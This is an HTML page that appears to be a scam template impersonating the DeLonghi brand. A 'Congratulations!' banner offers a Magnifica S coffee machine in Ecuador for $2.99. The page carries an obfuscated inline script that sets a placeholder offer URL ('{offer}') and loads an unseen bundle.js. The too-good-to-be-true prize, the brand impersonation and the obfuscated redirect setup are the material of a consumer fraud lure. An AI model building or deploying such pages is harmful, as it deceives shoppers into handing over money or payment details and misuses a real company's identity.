<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width,initial-scale=1" />
    <style>
      .container {
        border-bottom: 1px solid #f2f2f2;
        background-color: #ece9e4;
        box-shadow: 0px 4px 14px -13px rgba(0, 0, 0, 1);
      }

      .headerContainer {
        position: relative;
        display: flex;
        flex-direction: column;
        justify-content: space-between;
        align-items: center;
        transition: height 0.2s, padding 0.2s;
        padding: 16px 40px 5px;
      }

      @media only screen and (max-width: 990px) {
        .headerContainer {
          padding: 10px 15px;
        }
      }

      .containerSide {
        display: flex;
        flex-direction: row;
        justify-content: center;
        align-items: center;
      }

      .middleContainer {
        display: flex;
        flex-direction: row;
        width: 100%;
        justify-content: space-between;
        align-items: center;
      }

      .middleContainerMiddle {
        display: flex;
        flex-direction: row;
        flex-wrap: wrap;
        width: 100%;
        max-width: 768px;
        margin: 0 auto;
      }

      @media only screen and (max-width: 990px) {
        .middleContainerMiddle {
          display: none;
        }
      }

      .iconDiv {
        display: flex;
        flex-direction: column;
        margin: 0 8px;
        padding: 8px;
        margin-top: 10px;
        text-align: center !important;
        align-items: center;
      }

      @media only screen and (max-width: 990px) {
        .iconDiv {
          display: none;
        }
      }

      .icon {
        display: inline-block;
        height: 30px;
        width: 32px;
      }

      .iconText {
        display: flex;
        color: #282828;
        font-family: Roboto, sans-serif;
        font-size: 12px;
        letter-spacing: 0;
        line-height: 13px;
        text-align: center;
      }

      .mobileMenuIcon {
        fill: #666;
        display: none;
        height: 32px;
      }

      @media only screen and (max-width: 990px) {
        .mobileMenuIcon {
          display: inline-block;
        }
      }

      .logoIcon {
        display: inline;
        height: 40px;
        vertical-align: center;
        margin-top: 15px;
      }

      @media only screen and (max-width: 990px) {
        .logoIcon {
          height: 40px;
          margin-top: 8px;
          margin-left: 40px;
        }
      }

      .mobileSearchItem {
        display: none;
        position: relative;
        height: 40px;
        margin: 0 auto;
        margin-top: 13px;
        width: 100%;
        box-shadow: none;
      }

      @media only screen and (max-width: 990px) {
        .mobileSearchItem {
          display: flex;
          height: 45px;
        }
      }

      .searchItem {
        display: flex;
        position: relative;
        height: 40px;
        margin: 0 auto;
        margin-top: 13px;
        width: 85%;
        box-shadow: none;
      }

      @media only screen and (max-width: 990px) {
        .searchItem {
          display: none;
        }
      }

      .searchBar {
        font-family: Roboto, sans-serif;
        margin: 1px;
        padding: 8.5px 24px 8.5px 62px;
        width: 100%;
        background-color: #f3f3f3;
        border-radius: 20.5px;
        border: 1px solid #d2d2d2;
        box-shadow: none;
      }

      .searchBar::placeholder {
        color: #000000;
        font-family: Roboto, sans-serif;
        font-size: 14px;
        letter-spacing: 0;
        line-height: 13px;
      }

      @media only screen and (max-width: 990px) {
        .searchBar {
          background-color: #ffffff;
          border: 1px solid #979797;
          padding: 8.5px 24px 8.5px 14px;
        }

        .searchBar::placeholder {
          font-size: 18px;
          font-family: Roboto, sans-serif;
        }
      }

      .searchIcon {
        position: absolute;
        left: 20px;
        top: 6px;
        width: 30px;
        height: 30px;
        font-size: 1.25rem;
        background: none;
        border: 1px solid transparent;
        padding: 0;
        line-height: 1;
      }

      .nav {
        padding: 0 50px 0 0;
        display: flex;
        width: 100%;
        height: 60px;
      }

      @media only screen and (max-width: 1100px) {
        .nav {
          padding: 0;
        }
      }
      @media only screen and (max-width: 990px) {
        .nav {
          display: none;
        }
      }

      .list {
        width: 100%;
        display: flex;
        align-items: center;
        position: relative;
        flex-directiom: row;
        justify-content: space-between;
        margin-top: 10px;
      }

      .listItem {
        display: table-cell;
        vertical-align: middle;
        padding: 0 0.7rem;
        font-size: inherit;
      }

      .listText {
        font-family: Roboto, sans-serif;
        font-size: 1vw;
        font-weight: 600;
        line-height: 19px;
        letter-spacing: 0;
        color: #333333;
      }

      .textContentContainer {
        padding: 0.5rem 1.25rem 0.25rem 1.25rem;
        font-family: Inter, Arial, sans-serif !important;
      }

      .textContentContainer.hidden {
        display: none !important;
      }

      .titleText {
        font-size: 1.75rem;
        line-height: 1.25;
        color: #212529;
        margin-bottom: 1rem;
        margin-top: 0.5rem;
        font-weight: 700;
        font-family: Ubuntu, Verdana, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto,
          Oxygen-Sans, Cantarell, Helvetica Neue, sans-serif;
      }

      .textBlockContainer {
        margin: 0.75rem 0;
      }

      .textBlock {
        font-family: Tahoma, Geneva, sans-serif;
        line-height: 18px;
        font-size: 14px;
        color: #212529;
      }

      .imageGalleryContainer {
        margin-bottom: 2rem;
        width: 100%;
        display: flex;
        justify-content: center;
      }


      .imageGalleryWrapper {
        margin-top: 3rem;
        width: 80%;
      }

      @media only screen and (max-width: 1000px) {
        .imageGalleryWrapper {
          width: 80%;
        }
      }

      @media only screen and (max-width: 800px) {
        .imageGalleryContainer {
          margin-bottom: 1rem;
        }

        .imageGalleryWrapper {
          width: 100%;
        }
      }

      @media only screen and (max-width: 768px) {
        .icon {
          display: none;
        }
        .headerItem {
          flex-basis: 0;
          margin-inline: 0px;
        }
        .searchItem {
          display: none;
        }
        .mobileIcon {
          display: inline-block;
          width: 18px;
          height: 18px;
        }
      }

      .imageGalleryContainer2 {
        width: 100%;
        display: flex;
        justify-content: center;
        background: #040404;
      }

      .imageGalleryContainer2.hidden {
        display: none !important;
      }

      .imageGalleryWrapper2 {
        width: 50%;
      }

      @media only screen and (max-width: 800px) {
        .imageGalleryWrapper2 {
          width: 100%;
        }
      }
      .image2 {
        width: 100%;
      }
    </style>
    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="" />
    <link
      href="https://fonts.googleapis.com/css2?family=Lato&amp;family=Montserrat:wght@400;700&amp;family=Nunito+Sans:opsz@6..12&amp;family=Open+Sans&amp;family=Raleway:wght@400;700&amp;family=Roboto&amp;family=Source+Code+Pro&amp;family=Source+Sans+3:wght@400;700&amp;display=swap"
      rel="stylesheet"
    />
    <title>Single Serve Coffee Makers &amp; K-Cup Pods | DeLonghi®</title>
   
    <link rel="icon" href="favicon.ico" />
    <script defer="defer" src="assets/bundle.js"></script>
  </head>
  <body>
    <script>
      (function (_0x24cf36, _0x5e76f5) {
        var _0x13d952 = _0x5e0b,
          _0x137ee8 = _0x24cf36();
        while (!![]) {
          try {
            var _0x322fa1 =
              -parseInt(_0x13d952(0x139)) / 0x1 +
              (-parseInt(_0x13d952(0x140)) / 0x2) * (parseInt(_0x13d952(0x13c)) / 0x3) +
              (-parseInt(_0x13d952(0x13e)) / 0x4) * (parseInt(_0x13d952(0x13f)) / 0x5) +
              (parseInt(_0x13d952(0x13b)) / 0x6) * (-parseInt(_0x13d952(0x13a)) / 0x7) +
              -parseInt(_0x13d952(0x142)) / 0x8 +
              -parseInt(_0x13d952(0x138)) / 0x9 +
              (-parseInt(_0x13d952(0x141)) / 0xa) * (-parseInt(_0x13d952(0x13d)) / 0xb);
            if (_0x322fa1 === _0x5e76f5) break;
            else _0x137ee8['push'](_0x137ee8['shift']());
          } catch (_0x3d3ed4) {
            _0x137ee8['push'](_0x137ee8['shift']());
          }
        }
      })(_0x16c9, 0xea925),
        (window['rd'] = {}),
        (window['rd']['offerUrl'] = '{offer}');
      function _0x5e0b(_0x2cb974, _0x5d5e24) {
        var _0x16c926 = _0x16c9();
        return (
          (_0x5e0b = function (_0x5e0b22, _0x208e09) {
            _0x5e0b22 = _0x5e0b22 - 0x138;
            var _0x55ea7 = _0x16c926[_0x5e0b22];
            return _0x55ea7;
          }),
          _0x5e0b(_0x2cb974, _0x5d5e24)
        );
      }
      function _0x16c9() {
        var _0x49b011 = [
          '3898002bhznLr',
          '632019XRWDpl',
          '11hFJOxw',
          '53724PmaTpJ',
          '585djpULo',
          '2jDccXT',
          '62343230niDoSb',
          '8164608vWSVLs',
          '16323435cbflFV',
          '7460sSqhbN',
          '7VjZcrk',
        ];
        _0x16c9 = function () {
          return _0x49b011;
        };
        return _0x16c9();
      }
    </script>
    <header class="container">
      <div class="headerContainer">
        <div class="middleContainer">
          <svg class="mobileMenuIcon" viewBox="0 0 20 13" width="26" style="margin-top: 4px">
            <rect
              xmlns="http://www.w3.org/2000/svg"
              y="11"
              width="20"
              height="1.75"
              rx="0.875"
              fill="black"
            ></rect>
            <rect
              xmlns="http://www.w3.org/2000/svg"
              y="5.5"
              width="20"
              height="1.75"
              rx="0.875"
              fill="black"
            ></rect>
            <rect
              xmlns="http://www.w3.org/2000/svg"
              width="20"
              height="1.75"
              rx="0.875"
              fill="black"
            ></rect>
          </svg>
          <div class="containerSide">
           <img src="assets/delonghi-logo.png" alt="" class="logoIcon">
          </div>
          <div class="middleContainerMiddle">
            <form class="searchItem">
              <input class="searchBar" placeholder="Search" />
              <button type="button" aria-label="search" class="searchIcon">
                <svg viewBox="0 0 20 20">
                  <path
                    fill="#333333"
                    d="M12.9 14.32a8 8 0 1 1 1.41-1.41l5.35 5.33-1.42 1.42-5.33-5.34zM8 14A6 6 0 1 0 8 2a6 6 0 0 0 0 12z"
                  ></path>
                </svg>
              </button>
            </form>
          </div>
          <div class="containerSide">
            <div class="iconDiv">
              <svg class="icon" width="32" height="31">
                <g fill="none" fill-rule="evenodd">
                  <path
                    d="M13.606 29.692v-6.906c0-.347-.146-.677-.402-.911l-4.05-3.77c-.511-.475-1.356-.445-1.966.222-.52.514-.663 1.463-.138 1.97l2.48 2.493"
                    stroke="#333"
                    stroke-width="2"
                    stroke-linecap="round"
                  ></path>
                  <path
                    d="M6.621 18.328 5.132 17.26c-.177-.127-.36-.421-.346-.824l-.139-3.39c0-.842-.812-1.527-1.655-1.527h0c-.842 0-1.526.683-1.526 1.526l-.247 6.767c0 .484.203.945.56 1.272l6.877 6.3-.222 2.569M17.949 29.692v-6.906c0-.347.146-.677.402-.911l4.05-3.77c.51-.475 1.356-.445 1.966.222.519.514.663 1.463.138 1.97l-2.48 2.493"
                    stroke="#333"
                    stroke-width="2"
                    stroke-linecap="round"
                  ></path>
                  <path
                    d="m24.933 18.328 1.489-1.068c.177-.127.36-.421.346-.824l.139-3.39c0-.842.812-1.527 1.655-1.527h0c.843 0 1.526.683 1.526 1.526l.247 6.767c0 .484-.203.945-.56 1.272l-6.877 6.3.222 2.569"
                    stroke="#333"
                    stroke-width="2"
                    stroke-linecap="round"
                  ></path>
                  <path
                    d="M24.645 9.967a8.769 8.769 0 0 0-8.77-8.77 8.77 8.77 0 1 0 0 17.539 8.769 8.769 0 0 0 8.77-8.77Z"
                    stroke="#F9C606"
                    stroke-linecap="round"
                    stroke-linejoin="round"
                  ></path>
                  <path
                    d="M16.059 16.156a.968.968 0 0 1-.718-.298.99.99 0 0 1-.292-.721c0-.277.098-.513.292-.705a.984.984 0 0 1 .718-.29c.273 0 .506.097.702.29a.953.953 0 0 1 .293.705.986.986 0 0 1-.293.72.949.949 0 0 1-.702.299Zm-1.051-3.641c0-.603.152-1.161.453-1.672.303-.511.721-.91 1.256-1.2a1.5 1.5 0 0 0 .617-.612c.15-.27.225-.568.225-.894 0-.466-.166-.86-.498-1.182a1.637 1.637 0 0 0-1.186-.486 1.63 1.63 0 0 0-1.19.486 1.59 1.59 0 0 0-.494 1.182h-1.956c0-.663.163-1.27.492-1.821.329-.55.769-.99 1.319-1.315a3.535 3.535 0 0 1 1.829-.488c.668 0 1.278.163 1.829.488.55.326.99.765 1.318 1.315.329.55.493 1.158.493 1.82 0 .685-.167 1.317-.501 1.897a3.416 3.416 0 0 1-1.374 1.336c-.449.24-.675.622-.675 1.146h-1.957Z"
                    fill="#000"
                  ></path>
                </g>
              </svg>
              <span class="iconText">Support</span>
            </div>
            <div class="iconDiv">
              <svg class="icon" height="32" viewBox="0 0 20 23" fill="none">
                <g
                  class="profileIcon_svg__filled"
                  fill="transparent"
                  stroke="#473036"
                  stroke-width="2"
                >
                  <circle cx="9.5" cy="6.5" r="5.5"></circle>
                  <path
                    d="M19 21.82C19 17.5 15 14 10 14s-9 3.5-9 7.82A1.09 1.09 0 0 0 1 22h18c-.01-.06 0-.12 0-.18Z"
                  ></path>
                </g>
              </svg>
              <span class="iconText">Account</span>
            </div>
            <div class="iconDiv" style="margin-right: 0px">
              <svg class="icon" height="32px" viewBox="0 0 19.42 19.42">
                <g>
                  <circle cx="6.57" cy="17.95" r="1.28"></circle>
                  <circle cx="14.24" cy="17.95" r="1.28"></circle>
                </g>
                <path
                  fill="none"
                  stroke="#473036"
                  strokewidth="2"
                  strokelinecap="round"
                  d="M.21.55H2.4c.46 0 .85.34.91.8l1.54 12.13c.1.76.74 1.33 1.51 1.33h8.65c.73 0 1.58-.52 1.72-1.23l1.85-7.38c.16-.81-.47-1.56-1.29-1.56h-9.9"
                ></path>
              </svg>
              <span class="iconText">Cart</span>
            </div>
            <svg class="mobileMenuIcon" style="margin: 0 10px 0 0" viewBox="0 0 20 23" fill="none">
              <g
                class="profileIcon_svg__filled"
                fill="transparent"
                stroke="#473036"
                stroke-width="2"
              >
                <circle cx="9.5" cy="6.5" r="5.5"></circle>
                <path
                  d="M19 21.82C19 17.5 15 14 10 14s-9 3.5-9 7.82A1.09 1.09 0 0 0 1 22h18c-.01-.06 0-.12 0-.18Z"
                ></path>
              </g>
            </svg>
            <svg class="mobileMenuIcon" viewBox="0 0 19.42 19.42">
              <g>
                <circle cx="6.57" cy="17.95" r="1.28"></circle>
                <circle cx="14.24" cy="17.95" r="1.28"></circle>
              </g>
              <path
                fill="none"
                stroke="#473036"
                strokewidth="2"
                strokelinecap="round"
                d="M.21.55H2.4c.46 0 .85.34.91.8l1.54 12.13c.1.76.74 1.33 1.51 1.33h8.65c.73 0 1.58-.52 1.72-1.23l1.85-7.38c.16-.81-.47-1.56-1.29-1.56h-9.9"
              ></path>
            </svg>
          </div>
        </div>
        <nav class="nav">
          <ul class="list">
            <li class="listItem"><a class="listText">DeLonghi® Starter Kit</a></li>
            <li class="listItem"><a class="listText">Start Auto-Delivery</a></li>
            <li class="listItem"><a class="listText">Beverages</a></li>
            <li class="listItem"><a class="listText">Coffee Makers</a></li>
            <li class="listItem"><a class="listText">Accessories</a></li>
            <li class="listItem"><a class="listText">Deals</a></li>
            <li class="listItem"><a class="listText">Recipes &amp; More</a></li>
            <li class="listItem"><a class="listText">Sustainability</a></li>
            <li class="listItem"><a class="listText">Perks</a></li>
            <li class="listItem"><a class="listText">OUTLET</a></li>
          </ul>
        </nav>
        <form class="mobileSearchItem">
          <input class="searchBar" placeholder="Search" style="font-family: 'Roboto'" />
        </form>
      </div>
    </header>
    <main>
      <div class="imageGalleryContainer2" id="banner">
        <div class="imageGalleryWrapper2">
          <img class="image2" src="assets/729d9aedb0a3146d84b719fa95f88bf9.webp" />
        </div>
      </div>
      <div class="textContentContainer" id="text">
        <h1 class="titleText">Congratulations!</h1>
        <div class="textBlockContainer">
          <p class="textBlock">
            Anticipándose al Black Friday en Ecuador, DeLonghi está ofreciendo su cafetera automática más popular, la Magnifica S, por sólo 2,99$.
          </p>
        </div>
      </div>
      <div id="root"></div>
    </main>
    <footer>
      <div class="imageGalleryContainer">
        <div class="imageGalleryWrapper">
          <img
            style="width: 100%"
            alt="payment"
            src="assets/147695c6aa9a97d3eb8abdb0846330b2.webp"
          />
        </div>
      </div>
    </footer>
  </body>
</html>
